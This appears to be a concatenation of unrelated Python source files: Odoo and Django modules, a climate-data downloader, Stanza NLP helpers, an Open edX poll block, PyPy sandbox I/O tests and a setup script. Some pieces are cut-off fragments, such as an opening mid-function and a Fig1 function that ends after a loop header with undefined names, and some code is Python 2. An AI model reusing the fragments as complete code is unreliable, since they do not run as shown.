print ("Adding child [%s/%s = %d], parent [%s/%s =%d], dist=%d"
% (child['type'], child['name'], child_id, parent['type'],
parent['name'], parent_id, dist))
db.engine.execute(LINK_INS, {'cid' : child_id, 'pid' : parent_id, 'dist' : dist})
parent_id = parent['pid']
session.commit()
if __name__ == '__main__':
main()
|
# Copyright 2016 LasLabs Inc.
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
from odoo.tests import common
@common.at_install(False)
@common.post_install(True)
class TestResUsers(common.TransactionCase):
def setUp(self):
super(TestResUsers, self).setUp()
self.user_vals = {'name': 'Test',
'login': 'login',
}
def new_record(self):
return self.env['res.users'].create(self.user_vals)
def test_available_action_types_excludes_user_default(self):
""" It should not contain `user_default` in avail actions """
self.user_vals['printing_action'] = 'user_default'
with self.assertRaises(ValueError):
self.new_record()
def test_available_action_types_includes_something_else(self):
""" It should still contain other valid keys """
self.user_vals['printing_action'] = 'server'
self.assertTrue(self.new_record())
def test_onchange_printer_tray_id_empty(self):
user = self.env['res.users'].new(
{'printer_tray_id': False})
user.onchange_printing_printer_id()
self.assertFalse(user.printer_tray_id)
def test_onchange_printer_tray_id_not_empty(self):
server = self.env['printing.server'].create({})
printer = self.env['printing.printer'].create({
'name': 'Printer',
'server_id': server.id,
'system_name': 'Sys Name',
'default': True,
'status': 'unknown',
'status_message': 'Msg',
'model': 'res.users',
'location': 'Location',
'uri': 'URI',
})
tray = self.env['printing.tray'].create({
'name': 'Tray',
'system_name': 'TrayName',
'printer_id': printer.id,
})
user = self.env['res.users'].new(
{'printer_tray_id': tray.id})
self.assertEqual(user.printer_tray_id, tray)
user.onchange_printing_printer_id()
self.assertFalse(user.printer_tray_id)
|
from datetime import datetime
import iso8601
from ocd_backend.items.popolo import (
PersonItem, OrganisationItem, MembershipItem)
class PopitBaseItem(object):
"""
Base class for importing things from a Popit instance.
"""
ignored_list_fields = {
'memberships': [
# FIXME: start and end dates for memberships borked due to ES configuration (?)
'start_date', 'end_date',
'url', 'html_url', 'contact_details', 'images', 'links'
],
# FIXME: start and end dates for memberships borked due to ES configuration (?)
# 'start_date', 'end_date'
'area': ['id', 'name']
}
def get_object_id(self):
return unicode(self.original_item['id'])
def get_original_object_id(self):
return self.get_object_id()
def get_original_object_urls(self):
try:
return self.original_item['meta']['original_object_urls']
except KeyError as e:
pass
try:
return {'html': self.original_item['html_url']}
except KeyError as e:
pass
return {}
def get_rights(self):
try:
return self.original_item['meta']['rights']
except KeyError as e:
return u'undefined'
def get_collection(self):
return unicode(self.source_definition['index_name'])
def get_combined_index_data(self):
combined_index_data = {
'hidden': self.source_definition['hidden']
}
for field in self.combined_index_fields:
if field not in self.original_item:
continue
if self.combined_index_fields[field] == unicode:
combined_index_data[field] = unicode(
self.original_item[field])
elif self.combined_index_fields[field] == datetime:
if self.original_item[field] is not None:
try:
combined_index_data[field] = iso8601.parse_date(
self.original_item[field])
except iso8601.ParseError as e:
combined_index_data[field] = None
elif self.combined_index_fields[field] == list:
if field in self.ignored_list_fields:
combined_index_data[field] = [
{k: v for k, v in l.iteritems() if k not in self.ignored_list_fields[field]} for l in self.original_item[field]]
else:
combined_index_data[field] = self.original_item[field]
elif self.combined_index_fields[field] == dict:
if field in self.ignored_list_fields:
combined_index_data[field] = {
k: v for k, v in self.original_item[field].iteritems() if k not in self.ignored_list_fields[field]}
else:
combined_index_data[field] = self.original_item[field]
else:
combined_index_data[field] = self.original_item[field]
return combined_index_data
def get_index_data(self):
return {}
def get_all_text(self):
text_items = []
return u' '.join(text_items)
class PopitPersonItem(PopitBaseItem, PersonItem):
"""
Imports persons from a popit instance.
"""
pass
class PopitOrganisationItem(PopitBaseItem, OrganisationItem):
"""
Imports organizations from a popit instance.
"""
pass
class PopitMembershipItem(PopitBaseItem, MembershipItem):
"""
Imports a membership from a popit instance.
"""
pass
|
from django.contrib.sitemaps import Sitemap
from .models import Category, Post
class PostSitemap(Sitemap):
changefreq = "weekly"
priority = 0.8
def items(self):
return Post.published.all()
def lastmod(self, obj):
return obj.created_on
class CategorySitemap(Sitemap):
changefreq = "weekly"
priority = 0.8
def items(self):
return Category.objects.all()
|
from django.conf.urls import *
from django.contrib.auth.decorators import login_required
from scaffold_report import views
from scaffold_report import report
report.autodiscover()
urlpatterns = patterns('',
url('^(?P<name>\w+)/$', login_required(views.ScaffoldReportView.as_view()), name='scaffold-report'),
url('^(?P<name>\w+)/view/$', login_required(views.DownloadReportView.as_view()), name='scaffold-report-download'),
)
|
from src.Types import TokenTypes
class Token():
def __init__(self, token_type: TokenTypes, value):
self.type = token_type
self.value = value
|
import numpy as np
import requests
"""
Module to download data, do moving average calculations.
"""
def generate_url(location):
url = f'http://berkeleyearth.lbl.gov/auto/Regional/TAVG/Text/{location}-TAVG-Trend.txt'
return url
def download_data(location):
"""
Downloads average temperature data for `location`. Returns as a np.array.
"""
url = generate_url(location)
response = requests.get(url)
data = np.loadtxt(response.iter_lines(), comments="%")
return data
def moving_average(data, width):
moving_avg = np.full(data.size, np.nan)
for i in range(width, moving_avg.size - width):
moving_avg[i] = np.mean(data[i - width:i + width])
return moving_avg
|
"""
GLCM:
The gray-level co-occurrence matrix (GLCM) is the distribution of simultaneously
occurring pixel values within a given offset. An offset is the position (distance
and direction) of adjacent pixels. As the name implies, the GLCM is always calculated
for a grayscale image.
"""
from cv2 import (imread, imshow, waitKey, cvtColor, COLOR_BGR2GRAY)
import skimage.feature as sk
import numpy as np
# Reading the image and converting it to grayscale
original_image = imread("images/Bill-Gates.jpg")
grayscale_image = cvtColor(original_image, COLOR_BGR2GRAY)
imshow("Grayscale Image", grayscale_image)
# Calculating GLCM of the grayscale image
glcm = sk.greycomatrix(grayscale_image, [2], [0, np.pi / 2])
print(f"GLCM: {glcm}")
waitKey(0)
|
from Tkinter import *
root = Tk()
def printName(event):
print("Hello my name is Bucky")
button_1 = Button(root, text="Print Message")
# <Button-1> is an event that means "clicked left mouse button"
button_1.bind("<Button-1>", printName) # (event, function)
button_1.pack()
root.mainloop()
|
###################################################################################
#
# Copyright (C) 2017 MuK IT GmbH
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###################################################################################
from odoo import api, fields, models
class ResConfigSettings(models.TransientModel):
_inherit = 'res.config.settings'
module_muk_web_preview_audio = fields.Boolean(
string="Preview Audio",
help="Extendes the Preview Dialog to support audio.")
module_muk_web_preview_csv = fields.Boolean(
string="Preview CSV",
help="Extendes the Preview Dialog to support csv files.")
module_muk_web_preview_image = fields.Boolean(
string="Preview Image",
help="Extendes the Preview Dialog to support image files.")
module_muk_web_preview_mail = fields.Boolean(
string="Preview Mail",
help="Extendes the Preview Dialog to support mails.")
module_muk_web_preview_markdown = fields.Boolean(
string="Preview Markdown",
help="Extendes the Preview Dialog to support markdown files.")
module_muk_web_preview_msoffice = fields.Boolean(
string="Preview MS Office",
help="Extendes the Preview Dialog to support office files.")
module_muk_web_preview_rst = fields.Boolean(
string="Preview ReStructuredText",
help="Extendes the Preview Dialog to support reStructuredText.")
module_muk_web_preview_text = fields.Boolean(
string="Preview Text",
help="Extendes the Preview Dialog to support text files.")
module_muk_web_preview_vector = fields.Boolean(
string="Preview Vector",
help="Extendes the Preview Dialog to support vector files.")
module_muk_web_preview_video = fields.Boolean(
string="Preview Video",
help="Extendes the Preview Dialog to support video files.") |
import os
import stanza
import torch
def stanza_pipeline(
lenguaje,
procesadores="tokenize, pos, lemma, mwt",
modelo_lemas="",
modelo_ner="",
modelo_pos="",
):
"""
Carga y retorna un pipeline, o flujo de trabajo, de Stanza del y \
lenguaje y con los procesos especificados por el usuario. Los \
procesos que el usuario puede elegir añadir al pipeline incluyen \
tokenización, *Part of Speech* (POS), lematización y \
*Named Entity Recognition* (NER), entre otros.
Para mayor información sobre estos modelos y los pipelines se puede \
consultar la página Stanza \
(https://stanfordnlp.github.io/stanza/pipeline.html#processors).
:param lenguaje: (str). Lenguaje para el que se desean cargar los modelos\
de Stanza. Stanza tiene modelos disponibles para varios lenguajes, \
dependiendo de la función a realizar. Para mayor información, visitar \
https://stanfordnlp.github.io/stanza/available_models.html
:param procesadores: (str). Valor por defecto: 'tokenize, pos, lemma'. \
Lista de procesadores, también entendidos como procesos o tareas \
que se desean aplicar a un texto de entrada, que se desean incluir \
en el pipeline. Se ingresa un string en el que los diferentes \
procesadores van separados por comas.
:param modelo_lemas: Ubicación de un \
archivo que contenga el modelo o procesador que el usuario desea \
utilizar para aplicar lematización a los textos. Si este parámetro se \
deja vacío, se utilizará el procesador disponible de la librería \
Stanza para el lenguaje especificado.
:type modelo_lemas: str, opcional
:param modelo_ner: (str). Valor por defecto: ''. Unicación de un archivo \
que contenga el modelo o procesador que el usuario desea utilizar \
para aplicar *Named Entity Recognition* a los textos. Si este \
parámetro se deja vacío, se utilizará el procesador disponible de la \
librería Stanza para el lenguaje especificado.
:param modelo_pos: (str). Valor por defecto: ''. Unicación de un archivo \
que contenga el modelo o procesador que el usuario desea utilizar \
para aplicar *Part of Speech* a los textos. Si este parámetro se deja \
vacío, se utilizará el procesador disponible de la librería Stanza \
para el lenguaje especificado.
:return: (stanza Pipeline). Pipeline de Stanza, del lenguaje especificado,\
con los procesadores determinados por el usuario. Si los modelos \
requeridos no están disponibles en el computador del usuario, la \
función descargará los modelos correspondientes, lo cual puede tardar \
algunos minutos dependiendo del tamaño de los modelos y la velocidad \
de conexión a internet del usuario.
"""
# Configuración básica del pipeline
config = {
"processors": procesadores,
"lang": lenguaje,
}
# Si se añade algún modelo custom, se agrega al diccionario
if modelo_pos != "":
config["pos_model_path"] = modelo_pos
if modelo_lemas is not None:
config["lemma_model_path"] = modelo_lemas
if modelo_ner != "":
config["ner_model_path"] = modelo_ner
# Intentar crear pipeline. Si el modelo no está descargado, se descarga
# primero
try:
nlp_pipe = stanza.Pipeline(**config, verbose=False)
except BaseException:
print(
(
"[INFO] Descargando modelo. Este proceso "
"puede tardar varios minutos.\n"
)
)
stanza.download(lenguaje, verbose=True)
print("\n[INFO] El modelo ha sido descargado.")
nlp_pipe = stanza.Pipeline(**config, verbose=False)
# Retornar pipeline
return nlp_pipe
def modificar_modelo(
nlp_pipe,
tipo,
nuevo_diccionario,
archivo_entrada=None,
archivo_salida=None,
gpu=False,
):
"""
A partir de un diccionario de entrada, modifica un procesador de un \
pipeline existente de Stanza.
:param nlp_pipe: (stanza Pipeline). Pipeline de Stanza que contiene \
el procesador que se desea modificar.
:param tipo: (str) ['lemma', 'pos', 'tokenize']. Tipo de procesador o \
modelo que se desea modificar.
:param nuevo_diccionario: (dict). Diccionario de Python que contiene los \
elementos para añadir o modificar en el modelo que se desea cambiar. \
Las llaves y los valores de este diccionario pueden tener distinta \
información, dependiendo del tipo de modelo que se va a modificar. \
Por ejemplo, para modificar el modelo de lematización (tipo='lemma'), \
las llaves del diccionario serán palabras y los valores del \
diccionario serán los lemas.
:param archivo_entrada: (str). Valor por defecto: ''. Ubicación del \
archivo que contiene el modelo o procesador que se desea modificar. \
Si se deja vacío este parámetro, la modificación se hará sobre el \
modelo que trae por defecto el pipeline de Stanza.
:param archivo_salida: (str). Valor por defecto: ''. Ubicación y nombre \
del archivo en donde se desea guardar el modelo o procesador \
modificado. Si este valor se deja vacío, la función retornará el \
pipeline con el modelo modificado, pero el modelo no será guardado.
:param gpu: (bool). Valor por defecto: False. Parámetro opcional que \
permite al usuario especificar si va a utilizar una GPU para cargar \
y modificar los objetos (modelos) de PyTorch.
:return: (stanza Pipeline). Pipeline de entrada, después de modificar el \
procesador o modelo determinado por el usuario.
"""
# Definir ubicación del modelo
tipo = tipo.lower()
if archivo_entrada is None:
procesador = [
i for i in nlp_pipe.loaded_processors if tipo in str(i).lower()
][0]
archivo_entrada = procesador.config["model_path"]
# Cargar modelo y diccionarios del modelo
locacion = "gpu" if gpu else "cpu"
modelo = torch.load(archivo_entrada, map_location=locacion)
if "lemma" in tipo:
dict_palabras, dict_compuesto = modelo["dicts"]
# Añadir nuevas palabras
for key in nuevo_diccionario:
if isinstance(key, tuple):
dict_compuesto[key] = nuevo_diccionario[key]
else:
dict_palabras[key] = nuevo_diccionario[key]
# TODO: falta completar los otros casos, se mirará cuando
# se incluya POS y NER en la librería
else:
pass
# dict_vocab = modelo["vocab"]
# Acá falta seguir el proceso para cada caso
# Establecer dónde se va a guardar el modelo
borrar_modelo = False
if archivo_salida is None:
borrar_modelo = True
archivo_salida = "{}.pt".format(os.getpid())
# Guardar modelo modificado
torch.save(modelo, archivo_salida)
# Cargar el modelo modificado
tipo = tipo.lower()
if tipo == "lemma":
nlp_pipe = stanza_pipeline("es", modelo_lemas=archivo_salida)
elif tipo == "pos":
nlp_pipe = stanza_pipeline("es", modelo_pos=archivo_salida)
elif tipo == "ner":
nlp_pipe = stanza_pipeline("es", modelo_ner=archivo_salida)
# Si no se especificó una ubicación para el modelo resultante, este se
# borra
if borrar_modelo:
os.remove(archivo_salida)
# Devolver modelo modificado
return nlp_pipe
|
'''Test-only models.
https://docs.djangoproject.com/en/2.0/topics/testing/advanced/#using-the-django-test-runner-to-test-reusable-applications
'''
from django.db import models
# Models
class SampleParentModel(models.Model):
sample_field = models.CharField(max_length=8)
class Meta:
db_table = 'parent'
class SampleChildModel(models.Model):
sample_field = models.CharField(max_length=8)
class SampleRelatedModel(models.Model):
parent = models.ForeignKey(SampleParentModel)
sample_field = models.CharField(max_length=8)
|
"""Poll module is ungraded xmodule used by students to
to do set of polls.
On the client side we show:
If student does not yet anwered - Question with set of choices.
If student have answered - Question with statistics for each answers.
"""
import html
import json
import logging
from collections import OrderedDict
from copy import deepcopy
from pkg_resources import resource_string
from web_fragments.fragment import Fragment
from lxml import etree
from openedx.core.djangolib.markup import Text, HTML
from xblock.fields import Boolean, Dict, List, Scope, String # lint-amnesty, pylint: disable=wrong-import-order
from xmodule.mako_module import MakoTemplateBlockBase
from xmodule.stringify import stringify_children
from xmodule.util.xmodule_django import add_webpack_to_fragment
from xmodule.x_module import (
HTMLSnippet,
ResourceTemplates,
shim_xmodule_js,
XModuleMixin,
XModuleDescriptorToXBlockMixin,
XModuleToXBlockMixin,
)
from xmodule.xml_module import XmlMixin
log = logging.getLogger(__name__)
_ = lambda text: text
class PollBlock(
MakoTemplateBlockBase,
XmlMixin,
XModuleDescriptorToXBlockMixin,
XModuleToXBlockMixin,
HTMLSnippet,
ResourceTemplates,
XModuleMixin,
): # pylint: disable=abstract-method
"""Poll Module"""
# Name of poll to use in links to this poll
display_name = String(
help=_("The display name for this component."),
scope=Scope.settings
)
voted = Boolean(
help=_("Whether this student has voted on the poll"),
scope=Scope.user_state,
default=False
)
poll_answer = String(
help=_("Student answer"),
scope=Scope.user_state,
default=''
)
poll_answers = Dict(
help=_("Poll answers from all students"),
scope=Scope.user_state_summary
)
# List of answers, in the form {'id': 'some id', 'text': 'the answer text'}
answers = List(
help=_("Poll answers from xml"),
scope=Scope.content,
default=[]
)
question = String(
help=_("Poll question"),
scope=Scope.content,
default=''
)
resources_dir = None
uses_xmodule_styles_setup = True
preview_view_js = {
'js': [
resource_string(__name__, 'js/src/javascript_loader.js'),
resource_string(__name__, 'js/src/poll/poll.js'),
resource_string(__name__, 'js/src/poll/poll_main.js')
],
'xmodule_js': resource_string(__name__, 'js/src/xmodule.js'),
}
preview_view_css = {
'scss': [
resource_string(__name__, 'css/poll/display.scss')
],
}
# There is no studio_view() for this XBlock but this is needed to make the
# the static_content command happy.
studio_view_js = {
'js': [],
'xmodule_js': resource_string(__name__, 'js/src/xmodule.js')
}
studio_view_css = {
'scss': []
}
def handle_ajax(self, dispatch, data): # lint-amnesty, pylint: disable=unused-argument
"""Ajax handler.
Args:
dispatch: string request slug
data: dict request data parameters
Returns:
json string
"""
if dispatch in self.poll_answers and not self.voted:
# FIXME: fix this, when xblock will support mutable types.
# Now we use this hack.
temp_poll_answers = self.poll_answers
temp_poll_answers[dispatch] += 1
self.poll_answers = temp_poll_answers
self.voted = True
self.poll_answer = dispatch
return json.dumps({'poll_answers': self.poll_answers,
'total': sum(self.poll_answers.values()),
'callback': {'objectName': 'Conditional'}
})
elif dispatch == 'get_state':
return json.dumps({'poll_answer': self.poll_answer,
'poll_answers': self.poll_answers,
'total': sum(self.poll_answers.values())
})
elif dispatch == 'reset_poll' and self.voted and \
self.xml_attributes.get('reset', 'True').lower() != 'false':
self.voted = False
# FIXME: fix this, when xblock will support mutable types.
# Now we use this hack.
temp_poll_answers = self.poll_answers
temp_poll_answers[self.poll_answer] -= 1
self.poll_answers = temp_poll_answers
self.poll_answer = ''
return json.dumps({'status': 'success'})
else: # return error message
return json.dumps({'error': 'Unknown Command!'})
def student_view(self, _context):
"""
Renders the student view.
"""
fragment = Fragment()
params = {
'element_id': self.location.html_id(),
'element_class': self.location.block_type,
'ajax_url': self.ajax_url,
'configuration_json': self.dump_poll(),
}
fragment.add_content(self.system.render_template('poll.html', params))
add_webpack_to_fragment(fragment, 'PollBlockPreview')
shim_xmodule_js(fragment, 'Poll')
return fragment
def dump_poll(self):
"""Dump poll information.
Returns:
string - Serialize json.
"""
# FIXME: hack for resolving caching `default={}` during definition
# poll_answers field
if self.poll_answers is None:
self.poll_answers = {}
answers_to_json = OrderedDict()
# FIXME: fix this, when xblock support mutable types.
# Now we use this hack.
temp_poll_answers = self.poll_answers
# Fill self.poll_answers, prepare data for template context.
for answer in self.answers:
# Set default count for answer = 0.
if answer['id'] not in temp_poll_answers:
temp_poll_answers[answer['id']] = 0
answers_to_json[answer['id']] = html.escape(answer['text'], quote=False)
self.poll_answers = temp_poll_answers
return json.dumps({
'answers': answers_to_json,
'question': html.escape(self.question, quote=False),
# to show answered poll after reload:
'poll_answer': self.poll_answer,
'poll_answers': self.poll_answers if self.voted else {},
'total': sum(self.poll_answers.values()) if self.voted else 0,
'reset': str(self.xml_attributes.get('reset', 'true')).lower()
})
_tag_name = 'poll_question'
_child_tag_name = 'answer'
@classmethod
def definition_from_xml(cls, xml_object, system):
"""Pull out the data into dictionary.
Args:
xml_object: xml from file.
system: `system` object.
Returns:
(definition, children) - tuple
definition - dict:
{
'answers': <List of answers>,
'question': <Question string>
}
"""
# Check for presense of required tags in xml.
if len(xml_object.xpath(cls._child_tag_name)) == 0:
raise ValueError("Poll_question definition must include \
at least one 'answer' tag")
xml_object_copy = deepcopy(xml_object)
answers = []
for element_answer in xml_object_copy.findall(cls._child_tag_name):
answer_id = element_answer.get('id', None)
if answer_id:
answers.append({
'id': answer_id,
'text': stringify_children(element_answer)
})
xml_object_copy.remove(element_answer)
definition = {
'answers': answers,
'question': stringify_children(xml_object_copy)
}
children = []
return (definition, children)
def definition_to_xml(self, resource_fs):
"""Return an xml element representing to this definition."""
poll_str = HTML('<{tag_name}>{text}</{tag_name}>').format(
tag_name=self._tag_name, text=self.question)
xml_object = etree.fromstring(poll_str)
xml_object.set('display_name', self.display_name)
def add_child(xml_obj, answer): # lint-amnesty, pylint: disable=unused-argument
# Escape answer text before adding to xml tree.
answer_text = str(answer['text'])
child_str = Text('{tag_begin}{text}{tag_end}').format(
tag_begin=HTML('<{tag_name} id="{id}">').format(
tag_name=self._child_tag_name,
id=answer['id']
),
text=answer_text,
tag_end=HTML('</{tag_name}>').format(tag_name=self._child_tag_name)
)
child_node = etree.fromstring(child_str)
xml_object.append(child_node)
for answer in self.answers:
add_child(xml_object, answer)
return xml_object
|
import json
import jsonschema
from jsonschema import validate
import error as error
class ModelSelection(object):
# Constructor
def __init__(self, jsonFilePath, estimator):
self.cv = None
self.verbose = 0
try:
with open('schemas/msSchema.json') as schema_file:
cvSchema = json.load(schema_file)
except FileNotFoundError as err:
template = "An exception of type {0} occurred. Arguments: {1!r}"
message = template.format(type(err).__name__, err.args)
print(message)
raise ValueError(error.errors['modelselection_config'])
if jsonFilePath != None:
try:
with open(jsonFilePath) as json_file:
try:
jsonData = json.load(json_file)
validate(instance=jsonData, schema=cvSchema)
except jsonschema.exceptions.ValidationError as err:
template = "An exception of type {0} occurred. Arguments: {1!r}"
message = template.format(type(err).__name__, err.args)
print(message)
raise ValueError(error.errors['modelselection_config'])
except ValueError as err:
template = "An exception of type {0} occurred. Arguments: {1!r}"
message = template.format(type(err).__name__, err.args)
print(message)
raise ValueError(error.errors['modelselection_config'])
self.parse(jsonData, estimator)
except FileNotFoundError as err:
template = "An exception of type {0} occurred. Arguments: {1!r}"
message = template.format(type(err).__name__, err.args)
print(message)
raise ValueError(error.errors['modelselection_config'])
else:
self.assign_default_values(estimator)
def parse(self, jsonData, estimator):
if 'cv' in jsonData:
self.cv = jsonData['cv']
self.process_scoring_param(jsonData, estimator)
def process_scoring_param(self, jsonData, estimator):
import sklearn.metrics as metrics
if 'verbose' in jsonData:
self.verbose = jsonData['verbose']
if 'scoring' in jsonData:
self.scoring = jsonData['scoring']
if estimator.is_regr:
if self.scoring in ['mean_absolute_error', 'mean_squared_error', 'mean_squared_log_error']:
self.metrics = self.scoring
self.scoring = 'neg_' + self.scoring
elif self.scoring in ['root_mean_squared_error']:
self.metrics = 'mean_squared_error'
self.is_RMSE = True
self.scoring = 'neg_' + self.scoring
elif self.scoring in ['r2']:
self.metrics = self.scoring + '_score'
else:
raise ValueError(error.errors['unknown_scoring_attribute'] + ' ' + self.scoring)
else:
if self.scoring in ['accuracy', 'balanced_accuracy']: #, 'average_precision']:
self.metrics = self.scoring + '_score'
else:
sl = self.scoring.split('_')
if sl[0] in ['f1', 'precision', 'recall']:
self.metrics = sl[0] + '_score'
if len(sl)>1:
if sl[1] in ['micro', 'macro', 'samples', 'weighted']:
self.metrics_average = sl[1]
elif sl[1] == 'binary' and estimator.n_classes == 2:
self.metrics_average = 'binary'
elif estimator.n_classes == 2:
self.metrics_average = 'binary'
else:
self.metrics_average = 'weighted'
elif estimator.n_classes == 2:
self.metrics_average = 'binary'
else:
self.scoring = self.scoring + '_weighted'
self.metrics_average = 'weighted'
else:
raise ValueError(error.errors['unknown_scoring_attribute'] + ' ' + self.scoring)
else:
self.assign_default_values(estimator)
def assign_default_values(self, estimator):
self.scoring = None
if estimator.is_regr:
if estimator.nick == 'ann':
self.metrics = 'mean_squared_error' #'r2_score'
else:
self.metrics = 'r2_score'
else:
self.metrics = 'accuracy_score' |
import py
import sys, os, time
import struct
from pypy.rpython.lltypesystem import rffi
from pypy.translator.interactive import Translation
from pypy.translator.sandbox.sandlib import read_message, write_message
from pypy.translator.sandbox.sandlib import write_exception
def expect(f, g, fnname, args, result, resulttype=None):
msg = read_message(f, timeout=10.0)
assert msg == fnname
msg = read_message(f, timeout=10.0)
assert msg == args
if isinstance(result, Exception):
write_exception(g, result)
else:
write_message(g, 0)
write_message(g, result, resulttype)
g.flush()
def test_open_dup():
def entry_point(argv):
fd = os.open("/tmp/foobar", os.O_RDONLY, 0777)
assert fd == 77
fd2 = os.dup(fd)
assert fd2 == 78
return 0
t = Translation(entry_point, backend='c', standalone=True, sandbox=True)
exe = t.compile()
g, f = os.popen2(exe, "t", 0)
expect(f, g, "ll_os.ll_os_open", ("/tmp/foobar", os.O_RDONLY, 0777), 77)
expect(f, g, "ll_os.ll_os_dup", (77,), 78)
g.close()
tail = f.read()
f.close()
assert tail == ""
def test_read_write():
def entry_point(argv):
fd = os.open("/tmp/foobar", os.O_RDONLY, 0777)
assert fd == 77
res = os.read(fd, 123)
assert res == "he\x00llo"
count = os.write(fd, "world\x00!\x00")
assert count == 42
os.close(fd)
return 0
t = Translation(entry_point, backend='c', standalone=True, sandbox=True)
exe = t.compile()
g, f = os.popen2(exe, "t", 0)
expect(f, g, "ll_os.ll_os_open", ("/tmp/foobar", os.O_RDONLY, 0777), 77)
expect(f, g, "ll_os.ll_os_read", (77, 123), "he\x00llo")
expect(f, g, "ll_os.ll_os_write", (77, "world\x00!\x00"), 42)
expect(f, g, "ll_os.ll_os_close", (77,), None)
g.close()
tail = f.read()
f.close()
assert tail == ""
def test_dup2_access():
def entry_point(argv):
os.dup2(34, 56)
y = os.access("spam", 77)
return 1 - y
t = Translation(entry_point, backend='c', standalone=True, sandbox=True)
exe = t.compile()
g, f = os.popen2(exe, "t", 0)
expect(f, g, "ll_os.ll_os_dup2", (34, 56), None)
expect(f, g, "ll_os.ll_os_access", ("spam", 77), True)
g.close()
tail = f.read()
f.close()
assert tail == ""
def test_stat_ftruncate():
from pypy.rpython.module.ll_os_stat import s_StatResult
from pypy.rlib.rarithmetic import r_longlong
r0x12380000007 = r_longlong(0x12380000007)
def entry_point(argv):
st = os.stat("somewhere")
os.ftruncate(st.st_mode, st.st_size) # nonsense, just to see outside
return 0
t = Translation(entry_point, backend='c', standalone=True, sandbox=True)
exe = t.compile()
g, f = os.popen2(exe, "t", 0)
st = os.stat_result((55, 0, 0, 0, 0, 0, 0x12380000007, 0, 0, 0))
expect(f, g, "ll_os.ll_os_stat", ("somewhere",), st,
resulttype = s_StatResult)
expect(f, g, "ll_os.ll_os_ftruncate", (55, 0x12380000007), None)
g.close()
tail = f.read()
f.close()
assert tail == ""
def test_time():
def entry_point(argv):
t = time.time()
os.dup(int(t*1000))
return 0
t = Translation(entry_point, backend='c', standalone=True, sandbox=True)
exe = t.compile()
g, f = os.popen2(exe, "t", 0)
expect(f, g, "ll_time.ll_time_time", (), 3.141592)
expect(f, g, "ll_os.ll_os_dup", (3141,), 3)
g.close()
tail = f.read()
f.close()
assert tail == ""
def test_oserror():
def entry_point(argv):
try:
os.stat("somewhere")
except OSError, e:
os.close(e.errno) # nonsense, just to see outside
return 0
t = Translation(entry_point, backend='c', standalone=True, sandbox=True)
exe = t.compile()
g, f = os.popen2(exe, "t", 0)
expect(f, g, "ll_os.ll_os_stat", ("somewhere",), OSError(6321, "egg"))
expect(f, g, "ll_os.ll_os_close", (6321,), None)
g.close()
tail = f.read()
f.close()
assert tail == ""
class TestPrintedResults:
def run(self, entry_point, args, expected):
t = Translation(entry_point, backend='c', standalone=True,
sandbox=True)
exe = t.compile()
from pypy.translator.sandbox.sandlib import SimpleIOSandboxedProc
proc = SimpleIOSandboxedProc([exe] + args)
output, error = proc.communicate()
assert error == ''
assert output == expected
def test_safefuncs(self):
import math
def entry_point(argv):
a = float(argv[1])
print int(math.floor(a - 0.2)),
print int(math.ceil(a)),
print int(100.0 * math.sin(a)),
mantissa, exponent = math.frexp(a)
print int(100.0 * mantissa), exponent,
fracpart, intpart = math.modf(a)
print int(100.0 * fracpart), int(intpart),
print
return 0
self.run(entry_point, ["3.011"], "2 4 13 75 2 1 3\n")
def test_safefuncs_exception(self):
import math
def entry_point(argv):
a = float(argv[1])
x = math.log(a)
print int(x * 100.0)
try:
math.log(-a)
except ValueError:
print 'as expected, got a ValueError'
else:
print 'did not get a ValueError!'
return 0
self.run(entry_point, ["3.011"], "110\nas expected, got a ValueError\n")
def test_os_path_safe(self):
def entry_point(argv):
print os.path.join('tmp', argv[1])
return 0
self.run(entry_point, ["spam"], os.path.join("tmp", "spam")+'\n')
|
# -*- coding: utf-8 -*-
"""dzo package setup script.
"""
from os import path
from setuptools import setup, find_packages, Extension
from Cython.Build import cythonize
from Cython.Distutils import build_ext
import dzo
# License
# with open(path.join(path.dirname(path.abspath(__file__)), 'LICENSE')) as fp:
# LICENSE = fp.read().strip('\n')
# Literal
NAME = 'dzo'
AUTHOR = 'Moriaki Saigusa'
AUTHOR_EMAIL = '[email protected]'
LICENSE = 'MIT'
LONG_DESCRIPTION = 'Python implemented portable and easy-to-use search engine'
URL = 'https://github.com/moriaki3193/dzo'
KEYWORDS = 'Python Search Engine'
TEST_SUITE = 'tests'
ZIP_SAFE = False
# List
PACKAGES = find_packages(exclude=('tests'))
TESTS_REQUIRE = ['pytest', 'pytest-cov']
SETUP_REQUIRES = ['pytest-runner']
INSTALL_REQUIRES = ['Cython', 'numpy', 'scipy', 'mecab-python3', 'typing-extensions']
CLASSIFIERS = [
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.7',
]
# Dict
ENTRY_POINTS = {
'console_scripts': [
'dzo=dzo._cmd.__main__:main'
]
}
EXTRAS_REQUIRE = {
'dev': ['mypy', 'pylint', 'numpy-stubs']
}
# Commands
CMDCLASS = {'build_ext': build_ext}
# Cython extensions
EXT_DIR = path.join(path.dirname(path.abspath(__file__)), 'dzo', '_ext')
EXT_MODULES = [
Extension('dzo._ext.core', [path.join(EXT_DIR, 'core.pyx')]),
]
setup(
name=NAME,
version=dzo.__version__,
description=dzo.__doc__.strip(),
author=AUTHOR,
author_email=AUTHOR_EMAIL,
url=URL,
license=LICENSE,
packages=PACKAGES,
tests_require=TESTS_REQUIRE,
extras_require=EXTRAS_REQUIRE,
setup_requires=SETUP_REQUIRES,
install_requires=INSTALL_REQUIRES,
keywords=KEYWORDS,
classifiers=CLASSIFIERS,
entry_points=ENTRY_POINTS,
cmdclass=CMDCLASS,
test_suite=TEST_SUITE,
zip_safe=ZIP_SAFE,
ext_modules=cythonize(EXT_MODULES, language_level='3')
)
|
def Fig1():
datasets = []
GoodNames = ['MGRAST', 'HMP', 'EMPclosed', 'BBS', 'CBC', 'MCDB', 'GENTRY', 'FIA']
for name in os.listdir(mydir +'data/micro'):
|
# -*- coding: utf-8 -*-
# -- General configuration -----------------------------------------------------
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# The suffix of source filenames.
source_suffix = ".rst"
# The master toctree document.
master_doc = "index"
# General information about the project.
